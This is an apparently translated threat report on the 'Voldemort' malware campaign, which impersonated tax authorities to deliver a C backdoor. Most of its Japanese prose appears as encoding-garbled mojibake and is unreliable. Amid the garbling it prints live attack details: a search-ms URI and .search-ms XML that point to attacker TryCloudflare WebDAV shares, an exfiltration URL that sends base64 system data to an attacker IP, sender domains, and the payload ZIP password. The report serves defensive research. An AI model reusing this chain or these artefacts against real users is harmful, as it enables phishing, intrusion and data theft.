äž»ãªèª¿æ»çµæ
- ãã«ãŒãã€ã³ãã®ãªãµãŒãã£ãŒã¯ããVoldemortïŒãŽã©ã«ãã¢ãŒãïŒããšåä»ãããã«ãŠã§ã¢ãé ä¿¡ããç¹ç°çãªæ»æãã£ã³ããŒã³ã確èªããŸããã
- ãã«ãŒããã€ã³ãã¯ã掻åã®ç®çã¯ã¹ãã€æŽ»åã§ãããšäžçšåºŠã®ç¢ºä¿¡ãæã£ãŠè©äŸ¡ããŠããŸãã
- ãã®æ»ææŽ»åã¯ãšãŒããããã¢ãžã¢ãã¢ã¡ãªã«ãæ¥æ¬ã®ååœæ¿åºã®çšååœå±ã«ãªãããŸããäžçäžã®æ°åã®çµç¹ãæšçã«ããŸããã
- æ»æã®æçµç®çã¯äžæã§ãããVoldemortïŒãŽã©ã«ãã¢ãŒãïŒã¯æ å ±åéãšè¿œå ãã€ããŒããããŠã³ããŒãããèœåãåããŠããŸãã
- Voldemortã®æ»æãã§ãŒã³ã¯ãã³ãã³ãã»ã¢ã³ãã»ã³ã³ãããŒã«ïŒC2ïŒã«Google ã¹ãã¬ããã·ãŒãã䜿ã£ãããå€éšå
±æã«ä¿åãããæ€çŽ¢ãã¡ã€ã«ã䜿ã£ãããããªã©ãç¹ç°çãªã«ã¹ã¿ãã€ãºæ©èœãåããŠããŸãã
æŠèŠ
2024幎8æããã«ãŒããã€ã³ãã®ãªãµãŒãã£ãŒã¯ãã«ã¹ã¿ã ãã«ãŠã§ã¢ãé ä¿¡ããããã«æ¬æ°ãªæ»æãã§ãŒã³ã䜿çšããç¹ç°çãªæ»æãã£ã³ããŒã³ã確èªããŸããããã«ãŒããã€ã³ãã¯ããã®ãã«ãŠã§ã¢å ã§äœ¿çšãããŠããå éšãã¡ã€ã«åãšæååã«åºã¥ããŠããã®ãã«ãŠã§ã¢ããVoldemortïŒãŽã©ã«ãã¢ãŒãïŒããšåœåããŸããã
ãã®æ»æãã§ãŒã³ã¯ãçŸåšãå€ãã®æ»æã§æµéããŠããè€æ°ã®ææ³ãšãšãã«ãGoogle ã¹ãã¬ããã·ãŒããã³ãã³ãã»ã¢ã³ãã»ã³ã³ãããŒã«ïŒC2ïŒã®ããã«äœ¿çšãããªã©ãäžè¬çã§ã¯ãªãææ³ã§æ§æãããŠããŸãããã®æŠè¡ãæè¡ãæé ïŒTTPïŒã®çµã¿åãããååœã®æ¿åºæ©é¢ã«ãªãããŸããèªãããŒãããtestãã®ãããªå¥åŠãªãã¡ã€ã«åãšãã¹ã¯ãŒãã¯æ³šç®ã«å€ããŸãããªãµãŒãã£ãŒã¯åœåããã®æŽ»åãã¬ããããŒã ã«ãããã®ã§ã¯ãªãããšçã£ãŠããŸãããã倧éã®ã¡ãã»ãŒãžãšãã«ãŠã§ã¢ã®åæã«ãããæ»æã°ã«ãŒãã«ãããã®ãšæå®ããŸããã
ãã«ãŒããã€ã³ãã¯ãããã¯æ å ±åéãç®çãšããAPTïŒé«åºŠæšçåæ»æïŒã§ããå¯èœæ§ãé«ããšäžçšåºŠã®ç¢ºä¿¡ãæã£ãŠè©äŸ¡ããŠããŸãããããããã«ãŒããã€ã³ã瀟ã¯ãç¹å®ã®æ»æã°ã«ãŒãïŒâ»ãã«ãŒããã€ã³ãã§ã¯TAã§å§ãŸãã°ã«ãŒãåœåïŒã«é«ãä¿¡é Œæ§ããã£ãŠã¢ããªãã¥ãŒã·ã§ã³ãããããã®ååãªããŒã¿ãçŸæç¹ã§ã¯æã¡åãããŠããŸãããæšçãåºç¯å²ã«åãã§ãããå žåçãªãµã€ããŒç¯çœªã®ç¹åŸŽãšäžèŽããŠããã«ãããããããæŽ»åã®æ§è³ªãšãã«ãŠã§ã¢ã®æ©èœã¯ãçŸæç¹ã§ã¯ééçå©çããããããã¹ãã€æŽ»åãžã®é¢å¿ã®é«ãã瀺ããŠããŸãã
Voldemortã¯Cèšèªã§æžãããã«ã¹ã¿ã ã»ããã¯ãã¢ã§ãæ
å ±åéã远å ã®ãã€ããŒããæäžããæ©èœãåããŠããŸãããã«ãŒããã€ã³ãã¯ããã®æ»æã°ã«ãŒãã®ã€ã³ãã©äžã§Cobalt Strikeããã¹ããããŠããããšã確èªããŠããããããé
ä¿¡ããããã€ããŒãã®1ã€ã§ããå¯èœæ§ãé«ããšèããŠããŸãã
æ»æãã£ã³ããŒã³è©³çް
æ»æéãšã¿ãŒã²ãã
2024幎8æ5æ¥ã«å§ãŸã£ãæªè³ªãªæŽ»åã«ã¯20,000ãè¶ ããã¡ãã»ãŒãžãå«ãŸããäžçã®70以äžã®çµç¹ã«åœ±é¿ãäžããŸãããæåã®ã¡ãã»ãŒãžã®æ³¢ã¯æ¯æ¥æ°çŸéã§ãããã8æ17æ¥ã«æ¥å¢ããåèš6,000éè¿ãã«ãªããŸããã
æ»æã°ã«ãŒãã¯ãæ§ã ãªçšååœå±ããã®ã¡ãã»ãŒãžãè£ ã£ãŠãåä¿¡è ã«çšåç³åã®å€æŽã«ã€ããŠéç¥ããŠããŸããæ»æãã£ã³ããŒã³ã®æéäžãç±³åœïŒIRS: å åœæ³å ¥åºïŒãè±åœïŒHM Revenue & CustomsïŒããã©ã³ã¹ïŒDirection Générale des Finances PubliquesïŒããã€ãïŒBundeszentralamt fÃŒr SteuernïŒãã€ã¿ãªã¢ïŒAgenzia delle EntrateïŒããããŠ8æ19æ¥ããã¯ã€ã³ãïŒIncome Tax DepartmentïŒãæ¥æ¬ïŒåœçšåºïŒã®çšååœå±ããªãããŸãã«äœ¿ãããŸãããããããã®æ»æã«ã¢ãŒïŒããšãææžïŒã¯ã«ã¹ã¿ãã€ãºããããªãããŸãããšããŠããåœå±ã®èšèªã§æžãããŠããŸããã
ãã«ãŒããã€ã³ãã®ã¢ããªã¹ãã¯ãã¡ãŒã«ã®æèšãšäžéšã®æšçãšããã人ç©ã«ã€ããŠå ¬éãããŠããæ å ±ãé¢é£ä»ã調æ»ãããšãããæ»æã°ã«ãŒããæšççµç¹ã®æŽ»ååœãã¡ãŒã«ã¢ãã¬ã¹ããæœåºã§ããåœãèšèªã§ã¯ãªããå± äœåœã䜿ã£ãŠæšçãçµã£ãŠããããšãçªãæ¢ããŸãããäŸãã°ã欧å·ã®å€åœç±çµç¹ã«å±ããããæšçãšãªã£ã人ç©ã¯ãå ¬éãããŠããæ å ±ããç±³åœãšçµã³ã€ããŠãããããç±³åœã®IRSïŒå åœæ³å ¥åºïŒã«ãªãããŸããé»åã¡ãŒã«ãåãåã£ãŠããŸããããã ããäžéšã®è¢«å®³è ã¯ããã®äººãšåå§ååã®äººç©ãã€ã³ã¿ãŒãããäžã§æ å ±ãå ¬éãããŠããå Žåãå®éã«æ»æãåãã被害è ã®å± äœåœãšã¯ç°ãªãèšèªãšå å®¹ã®æ»æã¡ãŒã«ãåãåã£ãŠããŸããã
é»åã¡ãŒã«ã¯äŸµå®³ãããçãã®ãããã¡ã€ã³ããéä¿¡ãããè¡çºè ã¯é»åã¡ãŒã«ã»ã¢ãã¬ã¹ã«å®åšããæ©é¢ã®ãã¡ã€ã³ãå«ããŠãããäŸãã°ãç±³åœåœçšåºã«ãªãããŸããé»åã¡ãŒã«ã¯ã次ã®ãããªãã®ã§ããã
å·®åºäºº: Federal IRS <no_reply_irs[.]gov@amecaindustrial[.]com>
ãã®ä»ã®éä¿¡è ãã¡ã€ã³ã«ã¯ä»¥äžãå«ãŸããŸãïŒ
tblsys[.]com
joshsznapstajler[.]com
ideasworkshop[.]it
è±åœïŒHM Revenue & CustomsïŒãšãã©ã³ã¹ïŒDirection Générale des Finances PubliquesïŒãæ¥æ¬ïŒåœçšåºïŒã«ãªãããŸããã¡ãŒã«æé¢
æ»æã¯18ã®ç°ãªãæ¥çš®ãæšçãšããŠããŸããããæšçãšãªã£ãçµç¹ã®ã»ãŒ4åã®1ã¯ä¿éºäŒç€Ÿã§ãããæ®ãã®50%ã¯èªç©ºå®å®ãé茞ã倧åŠã§ããã
Voldemortãã«ãŠã§ã¢ã®ã¡ãŒã«æ»æãã£ã³ããŒã³ã®æšçã®æ¥çš®å
èš³
æ»æãã§ãŒã³
ã¡ãã»ãŒãžã«ã¯ãInfinityFreeã§ãã¹ããããŠããã©ã³ãã£ã³ã°ããŒãžã«ãªãã€ã¬ã¯ãããGoogle AMP Cache URLãå«ãŸããŠããŸããã©ã³ãã£ã³ã°ããŒãžã«ã¯ãã¯ãªãã¯ãããšãã©ãŠã¶ã®ãŠãŒã¶ãŒãšãŒãžã§ã³ãããã§ãã¯ãããClick to view documentããªã³ã¯ãå«ãŸããŠããŸãã
InfinityFreeããã¹ãããã©ã³ãã£ã³ã°ããŒãžã§ã¯ãããã¯ã°ã©ãŠã³ãã§ãŠãŒã¶ãŒãšãŒãžã§ã³ãã®ãã§ãã¯ãè¡ããã
ãããã¥ã¡ã³ãã衚瀺ããã¿ã³ãã¯ãªãã¯ããåŸã被害è
ã«Windowsãšã¯ã¹ãããŒã©ãéãããæ±ãããããã¢ããã衚瀺ãã
User Agent ã«ãwindowsããå«ãŸããŠããå Žåããã©ãŠã¶ã¯.search-msã§çµããTryCloudflareã§ãã³ããªã³ã°ãããURIãæãsearch-ms URIã«ãªãã€ã¬ã¯ãããã被害è ã«Windowsãšã¯ã¹ãããŒã©ãéãããä¿ããŸããããã®ã¯ãšãªã被害è ã«è¡šç€ºãããããšã¯ãªããçµæãšããŠè¡šç€ºããããããã¢ããã®ã¿ã衚瀺ãããŸãããŸãããã®ã³ã°ãµãŒãã¹pingb.inãå®è¡ããŠããIPã¢ãã¬ã¹äžã®/stage1ã§çµããURLããç»åãããŒããããªãã€ã¬ã¯ãæåã®ãã°ãèšé²ããŸããpingb.inãµãŒãã¹ã䜿çšããããšã§ãæ»æè ã¯è¢«å®³è ã«é¢ãã远å ã®ãã©ãŠã¶ããã³ãããã¯ãŒã¯æ å ±ãåéããããšãã§ããŸãã
ã©ã³ãã£ã³ã°ããŒãžã«åã蟌ãŸããHTMLãªãã€ã¬ã¯ãããžãã¯
User Agent ã« "windows "ãå«ãŸããŠããªãå Žåããã©ãŠã¶ã¯ç©ºã®Google Drive URLã«ãªãã€ã¬ã¯ããããpingb.inã®IPããåæ§ã«ç»åãèªã¿èŸŒã¿ãŸãããURLã®æ«å°Ÿã¯/stage0ã«ãªããŸããããã«ãããæ»æè ã¯ããã¿ã³ãã¯ãªãã¯ãããæªæã®ããã³ã³ãã³ãã¯æäŸãããªãã£ã人ã®ãã©ãŠã¶ãšãããã¯ãŒã¯ã®è©³çްã远跡ããããšãã§ããŸãã
被害è ãWindowsãšã¯ã¹ãããŒã©ãŒãéãããšãåãå ¥ãããšãWindowsãšã¯ã¹ãããŒã©ãŒã¯ãªã³ã¯ããã.search-msãã¡ã€ã«ã®æç€ºã«åŸã£ãŠWindowsæ€çŽ¢ã¯ãšãªãŒãç¡èšã§å®è¡ããŸãã.search-msãã¡ã€ã«ã¯ãŠãŒã¶ãŒã«ããŠã³ããŒããããã衚瀺ããããããããšã¯ãªãããã®ããã°ã®ãä¿åãããæ€çŽ¢ãã¡ã€ã«åœ¢åŒã®æªçšãã§èª¬æãããã¡ã€ã«åœ¢åŒãæªçšããŸãããã®çµæãWindowsã·ã§ãŒãã«ãããã¡ã€ã«ïŒãã¡ã€ã«æ¡åŒµåãLNKã®ãã¡ã€ã«ïŒããŸãã¯ãã£ã³ããŒã³åŸåã§ã¯ãå ã®é»åã¡ãŒã«ã®ã«ã¢ãŒã«é¢é£ãããã¡ã€ã«åã䜿çšããWindowsãšã¯ã¹ãããŒã©ã§åæ§ã®LNKãå«ãZIPãã¡ã€ã«ã衚瀺ãããŸãã ãã®LNKãŸãã¯ZIPã¯ãåãTryCloudflareãã¹ãäžã«ãã¹ããããŠããŸãããå¥ã®WebDAVå ±æã§ãã \pubache ã«ãã¹ããããŠããŸãããã®ãã¡ã€ã«ã¯ãå€éšå ±æã§ã¯ãªããåä¿¡è ã®ãã¹ãã®ããŠã³ããŒã ãã©ã«ãã«çŽæ¥ãã¹ããããŠããããã«èŠããŸãããŸããPDFã¢ã€ã³ã³ã䜿ã£ãŠå¥ã®ãã¡ã€ã«ã¿ã€ããè£ ã£ãŠããŸããããã2ã€ã®ãã¯ããã¯ã«ãããåä¿¡è ã¯ããŒã«ã«ã®PDFãã¡ã€ã«ã§ãããšä¿¡ããã³ã³ãã³ããã¯ãªãã¯ããå¯èœæ§ãé«ããªã£ãŠããŸããŸãã
å€éšWebDAVã«ãã¹ããããŠããPDFãããããããŠãŒã¶ãŒã®ããŒã«ã«ããŠã³ããŒããã©ã«ãã«ãããã®ããã«èŠããããã·ã§ãŒãã«ãã
LNK ãå®è¡ããããšãPowerShell ãèµ·åãããåããã³ãã«äžã® 3 çªç®ã® WebDAV å ±æ (\resource\)ãã Python.exe ãå®è¡ãããåããã¹ãäžã® 4 çªç®ã®å ±æ (\resource\)ã«ãã Python ã¹ã¯ãªãããåŒæ°ãšããŠæž¡ãããŸããããã«ãããPythonã¯ã³ã³ãã¥ãŒã¿ã«ãã¡ã€ã«ãããŠã³ããŒãããããšãªããWebDAVå ±æããäŸåé¢ä¿ãçŽæ¥ããŒãããŠã¹ã¯ãªãããå®è¡ããŸãã
LNKãéãããšãã«ãŠãŒã¶ãŒã«è¡šç€ºãããã»ãã¥ãªãã£éç¥
å®è¡ãããPythonã¹ã¯ãªããã¯ãèšèªãšå°ççãªã¿ãŒã²ããã«ãã£ãŠããªãªãžãã«ã®ã«ã¢ãŒã«åºæã®ãã®ã§ããè峿·±ãããšã«ããã®ãã§ãã¯ã¯ã©ã³ãã£ã³ã°ããŒãžã§ãã§ã«è¡ãããŠããã«ããããããããªãã¬ãŒãã£ã³ã°ã·ã¹ãã ã®ãã§ãã¯ããå§ãŸããŸããã¹ã¯ãªãããWindowsç°å¢ãæ€åºãããšãç¹å®ã®ã¢ã¯ã·ã§ã³ãå®è¡ããŸããããããä»ã®ãªãã¬ãŒãã£ã³ã°ã»ã·ã¹ãã ã§ã¯ãäœã®æ©èœãå®è¡ãããŸãããWindowsäžã§ã®ãããã®ã¢ã¯ã·ã§ã³ã«ã¯ã以äžãå«ãŸããŸãïŒ
- Python颿°platform.uname()ã䜿ã£ãŠãã³ã³ãã¥ãŒã¿åãWindowsã®ããŒãžã§ã³æ å ±ãCPUæ å ±ãªã©ãã³ã³ãã¥ãŒã¿ã«é¢ããæ å ±ãåé
- äŸãã°ãã©ã³ãã£ã³ã°ããŒãžãšåãpingb.inã®IPã«GETãªã¯ãšã¹ãã§ããŒã¿ãURLã®base64ãšããŠéä¿¡ããããURLã«ã¯ä»¥äžã®ããã«/stage2-2/ãæå®ïŒ hxxp://83[.]147[.]243[.]18/p/7c31e3ebfb77ead34ea71900b1b0/stage2-2/[base64 string]
æ»æè ã®pingb.inã®Webã€ã³ã¿ãŒãã§ãŒã¹
pingb.inãã©ãã£ãã¯ã®PCAP
GETãªã¯ãšã¹ãã¯ãPython HTTPã©ã€ãã©ãªã«ãã£ãŠèªåçã«çæãããæšæºããããŒä»¥å€ãä»ã®ããŒã¿ãå«ãã§ããŸããããããŠãOpenDrive(OneDriveã®ãããªãã¡ã€ã«ãã¹ãã£ã³ã°ãµãŒãã¹)ããã¿ãŒã²ããåœã«é¢é£ããããšãPDFãããŠã³ããŒããããããéããŸãã
ãã©ã³ã¹ã®DGFIPïŒDirection Générale des Finances PubliquesïŒã«ãªãããŸããããšãPDF
ã¹ã¯ãªããã¯ãã³ã³ãã¥ãŒã¿åããŠãŒã¶ãŒåããã¡ã€ã³ããããŠåã³platform.uname()ã®çµæãåéãããããbase64æååãšããŠæ ŒçŽããäžèšã®ããã«æçš¿ããŸãããä»åã¯URLã«/stage1-2/ãå«ãã§ããŸã(stage2-2ã®åŸã«å®è¡ãããŠããã«ãããããã)ã
ããã¯ããã¹ã¯ãŒãã§ä¿è·ãããtest.pngãŸãã¯logo.pngãšããZIPãã¡ã€ã«ãOpenDriveããããŠã³ããŒãããããã%localappdata%MicrosoftWindows\test.zipãŸãã¯logo.zipãšããŠä¿åãã"test@123 "ãšãããã¹ã¯ãŒãã䜿çšããŠãäžèº«ã®CiscoCollabHost.exeãšCiscoSparkLauncher.dllãæœåºããŸãã
ãã®ãã¡ã€ã«ã¯ CiscoCollabHost.exe ãå®è¡ããPython ã¹ã¯ãªããã®æçµã¢ã¯ã·ã§ã³ãšããŠããŠã³ããŒããã ZIP ãåé€ããŸããCiscoCollabHost.exe 㯠WebEx ã«é¢é£ããæ£èŠã®å®è¡ãã¡ã€ã«ã§ãCiscoSparkLauncher.dll ãšãã DLL ããµã€ãããŒãããããã«äœ¿çšãããŸãã
ãšã¯ã¹ããŒããããDLLåãVoldemort_gdrive_dll.dllãããŸãã¯ãã£ã³ããŒã³åŸåã§ã¯ãVoldemort_gdrive_c.dllããæã€CiscoSparkLauncher.dllã«ã€ããŠã¯ãæ¬ã¬ããŒãã®ãã«ãŠã§ã¢åæã»ã¯ã·ã§ã³ã§è©³ãã説æããŠããŸããProofpointã¯ãã®ãã€ããŒããVoldemortãšããŠè¿œè·¡ããŠããŸãã
åã©ã³ãã£ã³ã° ããŒãžãžã® URL ã¯åºå®ãããŠããŸãããæåã® seach-ms ã¯ãšãªããã³ãã®åŸã® WebDAV å ±æã§äœ¿çšããã TryCloudflare ãã³ãã«ã®ãã¹ãåã¯ãé »ç¹ã«æ¯æ¥å€æŽãããŠããŸãããã¹ãåã倿ŽãããŠããWebDAVå ±æã®æ§é ã¯åãã§ãïŒ
\public\ - contains the .search-ms files.
\pub\ - contains the LNK or later ZIP files
\library\ - contains the Python distribution and dependencies
\resource\ - contains the Python scripts
Voldemortã¯æ
å ±åéæ©èœãåããããã¯ãã¢ã§ããã远å ã®ãã€ããŒããããŒãããããšãã§ããŸãããã®ãã«ãŠã§ã¢ãšé¢é£ãããã€ããŒãã®æè¡çãªè©³çްã«ã€ããŠã¯ã以äžãã芧ãã ããã
ãµã€ããŒç¯çœªã®é°å²æ°ãæã€APT掻å
è峿·±ãããšã«ããã®æ»æã°ã«ãŒãã¯ããµã€ããŒç¯çœªã®äžçã§ã¯äžè¬çã«ãªãã€ã€ããè€æ°ã®ãã¯ããã¯ã䜿çšããŠããããã®éãšã¿ãŒã²ãã£ã³ã°ããµã€ããŒç¯çœªãã£ã³ããŒã³ã«æ²¿ã£ããã®ã§ããããšã«å ããŠãç¹ç°çãªç¹åŸŽãæã£ãŠããŸããããã¯ããã®æ»æãã£ã³ããŒã³ã«ãããŠäœ¿ãããŠããèªãæå¥ã¯ããµã€ããŒç¯çœªã«ãããŠã¯å žåçãªãã®ã§ãããããã¯ãã¢ã«å«ãŸããæ©èœã¯ãã¹ãã€æŽ»åã«äœ¿çšãããããŒã«ã«éåžžèŠãããæ©èœãšããé¡äŒŒããŠããŸãã
æ»æã°ã«ãŒãã¯ããã¡ã€ã«ã¹ããŒãURIãæªçšããŠããã«ãŠã§ã¢ã®ã¹ããŒãžã³ã°ã®ããã«å€éšã®ãã¡ã€ã«å ±æãªãœãŒã¹ïŒç¹ã«WebDAVãšSMBïŒServer Message BlockïŒïŒã«ã¢ã¯ã»ã¹ããŸããããã¯ãã¹ããŒããfile://ãã䜿çšããæªæã®ããã³ã³ãã³ãããã¹ããããªã¢ãŒããµãŒããŒãæãããšã§è¡ãããŸãããã®æå£ã¯ãIABïŒã€ãã·ã£ã«ã»ã¢ã¯ã»ã¹ã»ãããŒã«ãŒïŒãå«ããµã€ããŒç¯çœªã®è åšã«ãã£ãŠããŸããŸãå€ãã é »ç¹ã« 芳å¯ãããããã«ãªã£ãŠããŸãã
ãã«ãŒããã€ã³ãã®ãªãµãŒãã£ãŒã¯æè¿ãCloudflareãã³ãã«ã®æªçšãå¢å ããŠããããšã確èªããŸãããç¹ã«ãæ»æè
ãã¢ã«ãŠã³ããäœæããã«1åéãã®ãã³ãã«ãäœæã§ããTryCloudflareæ©èœã泚ç®ãããŠããŸãããã³ãã«ã¯ãä»®æ³ãã©ã€ããŒããããã¯ãŒã¯ïŒVPNïŒãã»ãã¥ã¢ã·ã§ã«ïŒSSHïŒãããã³ã«ã䜿çšããããã«ãããŒã«ã«ãããã¯ãŒã¯äžã«ãªãããŒã¿ããªãœãŒã¹ã«ãªã¢ãŒãã¢ã¯ã»ã¹ããæ¹æ³ã§ãã TryCloudflare ãã³ãã«ã䜿çšãããã³ã«ãtrycloudflare[.]comäžã«ã©ã³ãã ãªãµããã¡ã€ã³ãçæãããŸãïŒäŸ: ride-fatal-italic-information[.]trycloudflare[.]comïŒããµããã¡ã€ã³ãžã®ãã©ãã£ãã¯ã¯ãCloudflareãéããŠéå¶è
ã®ããŒã«ã«ãµãŒããŒã«ãããã·ãããŸããæ³šç®ãã¹ãããšã«ãVoldemort ã®æŽ»åã§ã¯ããã«ãŒããã€ã³ããä»ã®æªæã®ããæŽ»åã¯ã©ã¹ã¿ãŒã§èŠ³æž¬ããããã«ãæ»æã¡ãã»ãŒãžãã£ã³ããŒã³ã®æ³¢ããšã«æ°ãããã³ãã«ãäœæããã®ã§ã¯ãªãã2024 幎 8 æã® 1 ãæéã§æ»æã°ã«ãŒãã䜿çšããç¬èªã® TryCloudflare ãã³ãã«ã¯ããã 4 ã€ã§ããã以åã«èŠ³æž¬ãããæŽ»åãšã¯ç°ãªãããã®ãã£ã³ããŒã³ã§ã¯ Python ã®äŸåé¢ä¿ããã¹ãäžã§çŽæ¥ããŠã³ããŒããããã代ããã« WebDAV å
±æããããŒããããŸããã
ä¿åãããæ€çŽ¢ãã¡ã€ã«åœ¢åŒã®æªçš
äžè¬çã«ãæ»æè ã¯Windowsã®æ€çŽ¢ãããã³ã«(search-ms)ãæªçšãããªã¢ãŒããã·ã³ã«ãã¹ããããŠãããã¡ã€ã«ããã©ã«ãå ã«ããŒã«ã«ã«è¡šç€ºããŸãããã®ææ³ã¯ãããŸããŸãªãªã¢ãŒãã¢ã¯ã»ã¹åããã€ã®æšéЬïŒRATïŒãå±éããããã«ãã䜿çšãããŸããSearch-msã¯ãã¢ããªã±ãŒã·ã§ã³ãJavaScriptããŸãã¯HTMLããä¿¡é Œã§ããã³ã³ãã³ãã®ããã«èŠãããªã¢ãŒããã¡ã€ã«ããã¹ãäžã«çŽæ¥è¡šç€ºããããšãå¯èœã«ããŸãããã«ãŒããã€ã³ãã¯ãã³ã¢ãã£ãã£ãã«ãŠã§ã¢ã®ãŠãŒã¶ãŒããã€ãã·ã£ã«ã»ã¢ã¯ã»ã¹ã»ãããŒã«ãŒïŒIABïŒã«è³ããŸã§ãè€æ°ã®ãµã€ããŒç¯çœªã®è åšè ããã®ææ³ã掻çšããŠããããšã確èªããŠããŸããVoldemortãã«ãŠã§ã¢ã®ãã£ã³ããŒã³ã§ã¯ãWebDAVå ±æäžã«æ€çŽ¢ã¯ãšãªããã¡ã€ã«ãšããŠä¿åãããä¿åæ€çŽ¢ãã¡ã€ã«åœ¢åŒïŒ.search-msïŒãšãããã»ãšãã©èŠ³æž¬ãããŠããªãææ³ã䜿çšãããŠããŸãã
éåžžãæ»æè ããã€ã¯ããœããã®æ€çŽ¢ãããã³ã«ãæªçšããå ŽåãURIã«ã¯æ€çŽ¢ãå®è¡ããããã¹ããå®è¡ãããã¯ãšãªãæ€çŽ¢ã®è¡šç€ºåãå«ãŸããŸãããã®ã±ãŒã¹ã§ã¯ãsearch-ms URIã«ã¯è¡šç€ºåãšãåãã.search-msã§çµããWebDAVå ±æäžã®URIã«å¯Ÿãã以äžã®ãããªãµãã¯ãšãªã ããå«ãŸããŠããŸããã
Search[:]displayname=Downloads&subquery=%5C%ways-sms-pmc-shareholders[.]trycloudflare.com@SSL%5Cpublic%5CSA150_Notes_2024.search-ms
ããã«äžå¯è§£ãªããšã«ããã®ã¯ãšãªãWindowsãšã¯ã¹ãããŒã©ã§éããšã代ããã«.lnkãŸãã¯.zipãã¡ã€ã«ã®æ€çŽ¢ã«èªå°ããããã¡ã€ã«ãéãããããšãªã©ã®è¡šç€ºã¯äžåãªããã¯ãšãªã¯ç¡èšã§å®è¡ãããŸãããããã«ããã«ãŒããã€ã³ãã®ãªãµãŒãã£ãŒãæåã§ãã¡ã€ã«ã®å Žæã確èªãããšããããã®ãã¡ã€ã«ã¯ããã¯ãthe \public shareã«ã¯ãããŸããã§ããããã®ä»£ããã«ã衚瀺ããããã¡ã€ã«ã¯åããã¹ãäžã«ããã˶ãå ±æã«ååšããŠããŸããã調æ»ã®çµæããªãµãŒãã£ãŒã¯ãéããšæ€çŽ¢URIãéããã®ãšåãäœéšãããããä»®æ³ãã©ã«ããçºèŠããŸããããã®ä»®æ³ãã©ã«ãã¯ãå®éã«ã¯æ€çŽ¢URIã§äœ¿çšãããŠãã.search-msãã¡ã€ã«ã§ããã
ãã©ãŠã¶çµç±ã§WebDAVå ±æãæåã§ãã©ãŠãº
ãããã®.search-msãã¡ã€ã«ã¯ã"Saved Search File Format"ãšããã¿ã€ãã®XMLãã¡ã€ã«ã§ããããšã倿ããŸãããéåžžããããã®ãã¡ã€ã«ã¯Windowsã§æ€çŽ¢ãå®è¡ããæ€çŽ¢ãŠã£ã³ããŠã§å³ã¯ãªãã¯ã㊠"Save search "ãéžæãããªã©ãæåã§æ€çŽ¢ãä¿åãããšãã«äœæãããŸãã
ããŒã«ã«ã§æ€çŽ¢ããæ€çŽ¢çµæãä¿åããŠ.search-msãã¡ã€ã«ãäœæ
æ€çŽ¢çµæãä¿åããåŸã®.search-msãã¡ã€ã«
æ€çŽ¢ãä¿åãããšãWindowsãã¹ãäžã®ä¿åãããæ€çŽ¢ãã©ã«ãã«.search-msãã¡ã€ã«ãäœæãããŸããããããæ¢ç¥ã®ãã¡ã€ã«ã¿ã€ãã®æ¡åŒµåã衚瀺ãããªãã·ã§ã³ãéžæãããŠããŠãããã®æ¡åŒµåã¯é ãããŸããããã¯ãWindowsã·ã§ãŒãã«ããã®æ¡åŒµå.lnkããŠãŒã¶ãŒãéåžžèŠãªãã®ãšäŒŒãŠããŸããä¿åãããæ€çŽ¢ã®æ©èœã¯ã誰ãã宿çã«åãæ€çŽ¢ãå®è¡ããäžè²«ããæ¹æ³ã§è¡šç€ºãããçµæã§ç°¡åã«ç¹°ãè¿ãããç¶æ³ãæå³ããŠããŸããsearch:ãsearch-ms.URIãšäŒŒãŠããŸãïŒURIãšåæ§ã«ãåãæ€çŽ¢ãå床å®è¡ããŸãããããã.search-msãã¡ã€ã«ã§ã¯ããŠãŒã¶ãŒã¯Windowsãšã¯ã¹ãããŒã©ã«çµæãããå ·äœçã«è¡šç€ºãããæ¹æ³ãæå®ããããšãã§ããŸãã.search-msãã¡ã€ã«ãæªçšãããšã被害è ãããŒã«ã«ãã·ã³äžã®ãã©ã«ãã«ããªãããšã瀺ãèŠçŽ ãããã广çã«é ãããšãã§ããŸãã
ãã®æ»æè ã䜿çšããŠãã.search-msãã¡ã€ã«ã®äžããè峿·±ãéšåãããã€ã玹ä»ããŸãïŒ
- ãã¡ã€ã«ãæåã§ç·šéããç¹ã«ãã¥ãŒã "ããŠã³ããŒã" ãšããŠè¡šç€ºããããã«æå®ïŒ
<viewInfo iconSize="32" stackIconSize="0" displayName="Downloads" autoListFlags="0"> - Windows ãšã¯ã¹ãããŒã©ãŒã§ãããŒã»ãã¥ãŒãå®çŸ©ããããšã§ããã¡ã€ã«ãã©ã®å
±æã§ãã¹ããããŠãããã瀺ãã¢ãŒãã£ãã¡ã¯ãããã广çã«é ãïŒ
<column viewField="System.ItemFolderPathDisplayNarrow"/> - å
±æäžã®æªæã®ãããã¡ã€ã«ã®ã¿ã衚瀺ããæ€çŽ¢æ¡ä»¶ïŒ
<condition type="leafCondition" property="System.FileName" operator="starts with" propertyType="string" value="ABC_of_Tax.zip" localeName="en-US"> - æ€çŽ¢ãããã©ã«ããŸãã¯å
±æãžã®ãã¹ãæå®ãGUIDã¯ãããã¯ãŒã¯ã®å Žæã瀺ãïŒ
<include path="::{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\\invasion-prisoners-inns-aging[.]trycloudflare[.]com@SSL\pub" attributes="1887437133"/> - .search-msãã¡ã€ã«ãäœæããWindowsãŠãŒã¶ãŒã®è¡šç€ºåãå«ãAuthor TypeïŒ
<author type="string">test</author>
ãã«ãŠã§ã¢è§£æ
ãã®ãã«ãŠã§ã¢ã¯ãDLLãã€ãžã£ãã¯ã«å¯ŸããŠè匱ãªCiscoCollabHost.exeãå©çšããŠå®è¡ãããŸãããã®å®è¡ãã¡ã€ã«ã¯ãå®è¡ãã¡ã€ã«ãšåããã£ã¬ã¯ããªã«ããCiscoSparkLauncher.dllãšããDLLãããŒãããããšããŸããããã®å Žåã¯ãã«ãŠã§ã¢ã§ããå¯äžã®èŠä»¶ã¯ãDLLãæ£ããååãæã¡ãSparkEntryPointãšãã颿°ããšã¯ã¹ããŒãããããšã§ãã
ãã®SparkEntryPointã¯ãçæéã§å®è¡ããããµã³ãããã¯ã¹ãåé¿ããããšãããžãã¿ãŒéãšãããã5ã10åã®ã¹ãªãŒãã¡ã«ããºã ã§éå§ããŸãã
ã¹ãªãŒãã¿ã€ã ã®èšç®
ãããŠãã«ãŠã§ã¢ã¯ãæ¯èŒçãŠããŒã¯ãªAPIãåçã«åŒã³åºãã«ãŒãã³ãæã£ãŠããŸãã颿°ã解決ããŠåŒã³åºãããã«ããã«ãŠã§ã¢ã¯DLLãã³ãã«ã颿°ãžã®ã³ãŒã«ããã¯ãåŒã³åºãããšãã颿°ã®åŒæ°ãæž¡ããŸãã
颿°ã解決ããŠåŒã³åºãããã®ã³ãŒã«
